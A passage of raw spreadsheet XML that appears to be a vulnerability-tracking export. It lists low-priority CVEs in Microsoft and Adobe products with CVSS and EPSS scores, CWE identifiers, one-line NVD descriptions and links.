t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K191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914" s="5" t="inlineStr" /><c r="M1914" s="5" t="inlineStr" /><c r="N1914" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1914" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1914" s="5" t="inlineStr" /><c r="Q1914" s="5" t="inlineStr"><is><t>CWE-125, CWE-200</t></is></c><c r="R1914" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t></is></c><c r="S1914" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t></is></c></row><row r="1915"><c r="A1915" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1915" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1915" s="5" t="inlineStr"><is><t>CVE-2026-70145</t></is></c><c r="D1915" s="5" t="n"><v>5.5</v></c><c r="E1915" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1915" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1915" s="5" t="inlineStr" /><c r="H1915" s="5" t="n"><v>0.004</v></c><c r="I1915" s="5" t="inlineStr" /><c r="J1915" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K191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15" s="5" t="inlineStr" /><c r="M1915" s="5" t="inlineStr" /><c r="N1915" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1915" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1915" s="5" t="inlineStr" /><c r="Q1915" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1915" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t></is></c><c r="S1915" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t></is></c></row><row r="1916"><c r="A1916" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1916" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1916" s="5" t="inlineStr"><is><t>CVE-2026-70290</t></is></c><c r="D1916" s="5" t="n"><v>5.5</v></c><c r="E1916" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1916" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1916" s="5" t="inlineStr" /><c r="H1916" s="5" t="n"><v>0.004</v></c><c r="I1916" s="5" t="inlineStr" /><c r="J1916" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K191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16" s="5" t="inlineStr" /><c r="M1916" s="5" t="inlineStr" /><c r="N1916" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1916" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1916" s="5" t="inlineStr" /><c r="Q1916" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1916" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t></is></c><c r="S1916" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t></is></c></row><row r="1917"><c r="A1917" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1917" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1917" s="5" t="inlineStr"><is><t>CVE-2026-71341</t></is></c><c r="D1917" s="5" t="n"><v>5.5</v></c><c r="E1917" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1917" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1917" s="5" t="inlineStr" /><c r="H1917" s="5" t="n"><v>0.004</v></c><c r="I1917" s="5" t="inlineStr" /><c r="J1917" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K191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17" s="5" t="inlineStr" /><c r="M1917" s="5" t="inlineStr" /><c r="N1917" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1917" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1917" s="5" t="inlineStr" /><c r="Q1917" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1917" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="S1917" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t></is></c></row><row r="1918"><c r="A1918" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1918" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1918" s="5" t="inlineStr"><is><t>CVE-2026-71441</t></is></c><c r="D1918" s="5" t="n"><v>5.5</v></c><c r="E1918" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1918" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1918" s="5" t="inlineStr" /><c r="H1918" s="5" t="n"><v>0.002</v></c><c r="I1918" s="5" t="inlineStr" /><c r="J1918" s="5" t="inlineStr" /><c r="K1918" s="5" t="inlineStr"><is><t>adobe:illustrator, apple:macos, microsoft:windows</t></is></c><c r="L1918" s="5" t="inlineStr" /><c r="M1918" s="5" t="inlineStr" /><c r="N1918" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1918" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P1918" s="5" t="inlineStr" /><c r="Q1918" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1918" s="5" t="inlineStr"><is><t>Illustrator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18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71441</t></is></c></row><row r="1919"><c r="A1919" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1919" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1919" s="5" t="inlineStr"><is><t>CVE-2026-72937</t></is></c><c r="D1919" s="5" t="n"><v>5.5</v></c><c r="E1919" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1919" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1919" s="5" t="inlineStr" /><c r="H1919" s="5" t="n"><v>0.004</v></c><c r="I1919" s="5" t="inlineStr" /><c r="J1919" s="5" t="inlineStr" /><c r="K1919" s="5" t="inlineStr" /><c r="L1919" s="5" t="inlineStr" /><c r="M1919" s="5" t="inlineStr" /><c r="N1919" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1919" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1919" s="5" t="inlineStr" /><c r="Q1919" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1919" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="S1919" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72937</t></is></c></row><row r="1920"><c r="A1920" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1920" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1920" s="5" t="inlineStr"><is><t>CVE-2026-72945</t></is></c><c r="D1920" s="5" t="n"><v>5.5</v></c><c r="E1920" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1920" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1920" s="5" t="inlineStr" /><c r="H1920" s="5" t="n"><v>0.004</v></c><c r="I1920" s="5" t="inlineStr" /><c r="J1920" s="5" t="inlineStr" /><c r="K1920" s="5" t="inlineStr" /><c r="L1920" s="5" t="inlineStr" /><c r="M1920" s="5" t="inlineStr" /><c r="N1920" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1920" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1920" s="5" t="inlineStr" /><c r="Q1920" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1920" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Task Scheduler allows an authorized attacker to disclose information locally.</t></is></c><c r="S1920" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72945</t></is></c></row><row r="1921"><c r="A1921" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1921" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1921" s="5" t="inlineStr"><is><t>CVE-2026-72964</t></is></c><c r="D1921" s="5" t="n"><v>5.5</v></c><c r="E1921" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1921" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1921" s="5" t="inlineStr" /><c r="H1921" s="5" t="n"><v>0.003</v></c><c r="I1921" s="5" t="inlineStr" /><c r="J1921" s="5" t="inlineStr" /><c r="K1921" s="5" t="inlineStr" /><c r="L1921" s="5" t="inlineStr" /><c r="M1921" s="5" t="inlineStr" /><c r="N1921" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1921" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1921" s="5" t="inlineStr" /><c r="Q1921" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1921" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Internet Connection Sharing (ICS) allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1921" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72964</t></is></c></row><row r="1922"><c r="A1922" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1922" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1922" s="5" t="inlineStr"><is><t>CVE-2026-72966</t></is></c><c r="D1922" s="5" t="n"><v>5.5</v></c><c r="E1922" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1922" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1922" s="5" t="inlineStr" /><c r="H1922" s="5" t="n"><v>0.003</v></c><c r="I1922" s="5" t="inlineStr" /><c r="J1922" s="5" t="inlineStr" /><c r="K1922" s="5" t="inlineStr" /><c r="L1922" s="5" t="inlineStr" /><c r="M1922" s="5" t="inlineStr" /><c r="N1922" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1922" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1922" s="5" t="inlineStr" /><c r="Q1922" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1922" s="5" t="inlineStr"><is><t>Missing authorization in Windows Remote Access Connection Manager allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1922" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72966</t></is></c></row><row r="1923"><c r="A1923" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1923" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1923" s="5" t="inlineStr"><is><t>CVE-2026-73004</t></is></c><c r="D1923" s="5" t="n"><v>5.5</v></c><c r="E1923" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1923" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1923" s="5" t="inlineStr" /><c r="H1923" s="5" t="n"><v>0.002</v></c><c r="I1923" s="5" t="inlineStr" /><c r="J1923" s="5" t="inlineStr" /><c r="K1923" s="5" t="inlineStr" /><c r="L1923" s="5" t="inlineStr" /><c r="M1923" s="5" t="inlineStr" /><c r="N1923" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1923" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1923" s="5" t="inlineStr" /><c r="Q1923" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1923" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Autopilot allows an authorized attacker to perform tampering locally.</t></is></c><c r="S1923" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73004</t></is></c></row><row r="1924"><c r="A1924" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1924" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1924" s="5" t="inlineStr"><is><t>CVE-2026-73008</t></is></c><c r="D1924" s="5" t="n"><v>5.5</v></c><c r="E1924" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1924" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1924" s="5" t="inlineStr" /><c r="H1924" s="5" t="n"><v>0.005</v></c><c r="I1924" s="5" t="inlineStr" /><c r="J1924" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1924"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924" s="5" t="inlineStr" /><c r="M1924" s="5" t="inlineStr" /><c r="N1924" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1924" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1924" s="5" t="inlineStr" /><c r="Q1924" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="R1924" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Biometric Service allows an authorized attacker to disclose information locally.</t></is></c><c r="S1924" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73008</t></is></c></row><row r="1925"><c r="A1925" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1925" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1925" s="5" t="inlineStr"><is><t>CVE-2026-77488</t></is></c><c r="D1925" s="5" t="n"><v>5.5</v></c><c r="E1925" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1925" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1925" s="5" t="inlineStr" /><c r="H1925" s="5" t="n"><v>0.003</v></c><c r="I1925" s="5" t="inlineStr" /><c r="J1925" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1925" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1925" s="5" t="inlineStr" /><c r="M1925" s="5" t="inlineStr" /><c r="N1925" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1925" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1925" s="5" t="inlineStr" /><c r="Q1925" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R1925" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in SQL Server allows an authorized attacker to disclose information locally.</t></is></c><c r="S1925" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77488</t></is></c></row><row r="1926"><c r="A1926" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1926" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1926" s="5" t="inlineStr"><is><t>CVE-2026-77491</t></is></c><c r="D1926" s="5" t="n"><v>5.5</v></c><c r="E1926" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1926" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1926" s="5" t="inlineStr" /><c r="H1926" s="5" t="n"><v>0.004</v></c><c r="I1926" s="5" t="inlineStr" /><c r="J1926" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K19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1926" s="5" t="inlineStr" /><c r="M1926" s="5" t="inlineStr" /><c r="N1926" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1926" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1926" s="5" t="inlineStr" /><c r="Q1926" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1926" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1926" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t></is></c></row><row r="1927"><c r="A1927" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1927" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1927" s="5" t="inlineStr"><is><t>CVE-2026-77492</t></is></c><c r="D1927" s="5" t="n"><v>5.5</v></c><c r="E1927" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1927" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1927" s="5" t="inlineStr" /><c r="H1927" s="5" t="n"><v>0.003</v></c><c r="I1927" s="5" t="inlineStr" /><c r="J1927" s="5" t="inlineStr" /><c r="K1927" s="5" t="inlineStr" /><c r="L1927" s="5" t="inlineStr" /><c r="M1927" s="5" t="inlineStr" /><c r="N1927" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1927" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1927" s="5" t="inlineStr" /><c r="Q1927" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1927" s="5" t="inlineStr"><is><t>Out-of-bounds read in Storage Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="S1927" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77492</t></is></c></row><row r="1928"><c r="A1928" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1928" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1928" s="5" t="inlineStr"><is><t>CVE-2026-78454</t></is></c><c r="D1928" s="5" t="n"><v>5.5</v></c><c r="E1928" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1928" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1928" s="5" t="inlineStr" /><c r="H1928" s="5" t="n"><v>0.004</v></c><c r="I1928" s="5" t="inlineStr" /><c r="J1928" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1928"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1928" s="5" t="inlineStr" /><c r="M1928" s="5" t="inlineStr" /><c r="N1928" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1928" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1928" s="5" t="inlineStr" /><c r="Q1928" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1928" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="S1928" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t></is></c></row><row r="1929"><c r="A1929" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1929" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1929" s="5" t="inlineStr"><is><t>CVE-2026-78506</t></is></c><c r="D1929" s="5" t="n"><v>5.5</v></c><c r="E1929" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1929" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1929" s="5" t="inlineStr" /><c r="H1929" s="5" t="n"><v>0.005</v></c><c r="I1929" s="5" t="inlineStr" /><c r="J1929" s="5" t="inlineStr" /><c r="K1929" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1929" s="5" t="inlineStr" /><c r="M1929" s="5" t="inlineStr" /><c r="N1929" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1929" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1929" s="5" t="inlineStr" /><c r="Q1929" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="R1929" s="5" t="inlineStr"><is><t>Improper null termination in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1929" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78506</t></is></c></row><row r="1930"><c r="A1930" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1930" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1930" s="5" t="inlineStr"><is><t>CVE-2026-78513</t></is></c><c r="D1930" s="5" t="n"><v>5.5</v></c><c r="E1930" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1930" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1930" s="5" t="inlineStr" /><c r="H1930" s="5" t="n"><v>0.005</v></c><c r="I1930" s="5" t="inlineStr" /><c r="J1930" s="5" t="inlineStr" /><c r="K1930" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1930" s="5" t="inlineStr" /><c r="M1930" s="5" t="inlineStr" /><c r="N1930" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1930" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1930" s="5" t="inlineStr" /><c r="Q1930" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1930" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1930" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78513</t></is></c></row><row r="1931"><c r="A1931" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1931" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1931" s="5" t="inlineStr"><is><t>CVE-2026-79910</t></is></c><c r="D1931" s="5" t="n"><v>5.5</v></c><c r="E1931" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1931" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1931" s="5" t="inlineStr" /><c r="H1931" s="5" t="n"><v>0.002</v></c><c r="I1931" s="5" t="inlineStr" /><c r="J1931" s="5" t="inlineStr" /><c r="K1931" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1931" s="5" t="inlineStr" /><c r="M1931" s="5" t="inlineStr" /><c r="N1931" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1931" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1931" s="5" t="inlineStr" /><c r="Q1931" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1931"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31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79910</t></is></c></row><row r="1932"><c r="A1932" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1932" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1932" s="5" t="inlineStr"><is><t>CVE-2026-80160</t></is></c><c r="D1932" s="5" t="n"><v>5.5</v></c><c r="E1932" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1932" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1932" s="5" t="inlineStr" /><c r="H1932" s="5" t="n"><v>0.002</v></c><c r="I1932" s="5" t="inlineStr" /><c r="J1932" s="5" t="inlineStr" /><c r="K1932" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1932" s="5" t="inlineStr" /><c r="M1932" s="5" t="inlineStr" /><c r="N1932" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1932" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1932" s="5" t="inlineStr" /><c r="Q1932" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1932"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32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80160</t></is></c></row><row r="1933"><c r="A1933" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1933" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1933" s="5" t="inlineStr"><is><t>CVE-2026-80162</t></is></c><c r="D1933" s="5" t="n"><v>5.5</v></c><c r="E1933" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1933" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1933" s="5" t="inlineStr" /><c r="H1933" s="5" t="n"><v>0.002</v></c><c r="I1933" s="5" t="inlineStr" /><c r="J1933" s="5" t="inlineStr" /><c r="K1933" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1933" s="5" t="inlineStr" /><c r="M1933" s="5" t="inlineStr" /><c r="N1933" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1933" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1933" s="5" t="inlineStr" /><c r="Q1933" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1933"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S1933" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80162</t></is></c></row><row r="1934"><c r="A1934" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1934" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1934" s="5" t="inlineStr"><is><t>CVE-2026-81387</t></is></c><c r="D1934" s="5" t="n"><v>5.5</v></c><c r="E1934" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1934" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1934" s="5" t="inlineStr" /><c r="H1934" s="5" t="n"><v>0.004</v></c><c r="I1934" s="5" t="inlineStr" /><c r="J1934" s="5" t="inlineStr" /><c r="K1934" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1934" s="5" t="inlineStr" /><c r="M1934" s="5" t="inlineStr" /><c r="N1934" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1934" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1934" s="5" t="inlineStr" /><c r="Q1934" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1934" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1934" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81387</t></is></c></row><row r="1935"><c r="A1935" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1935" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1935" s="5" t="inlineStr"><is><t>CVE-2026-81390</t></is></c><c r="D1935" s="5" t="n"><v>5.5</v></c><c r="E1935" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1935" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1935" s="5" t="inlineStr" /><c r="H1935" s="5" t="n"><v>0.004</v></c><c r="I1935" s="5" t="inlineStr" /><c r="J1935" s="5" t="inlineStr" /><c r="K1935" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1935" s="5" t="inlineStr" /><c r="M1935" s="5" t="inlineStr" /><c r="N1935" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1935" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1935" s="5" t="inlineStr" /><c r="Q1935" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1935" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1935" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81390</t></is></c></row><row r="1936"><c r="A1936" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1936" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1936" s="5" t="inlineStr"><is><t>CVE-2026-81391</t></is></c><c r="D1936" s="5" t="n"><v>5.5</v></c><c r="E1936" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1936" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1936" s="5" t="inlineStr" /><c r="H1936" s="5" t="n"><v>0.004</v></c><c r="I1936" s="5" t="inlineStr" /><c r="J1936" s="5" t="inlineStr" /><c r="K1936" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1936" s="5" t="inlineStr" /><c r="M1936" s="5" t="inlineStr" /><c r="N1936" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1936" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1936" s="5" t="inlineStr" /><c r="Q1936" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1936" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="S1936" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81391</t></is></c></row><row r="1937"><c r="A1937" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1937" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1937" s="5" t="inlineStr"><is><t>CVE-2026-81392</t></is></c><c r="D1937" s="5" t="n"><v>5.5</v></c><c r="E1937" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1937" s="5" 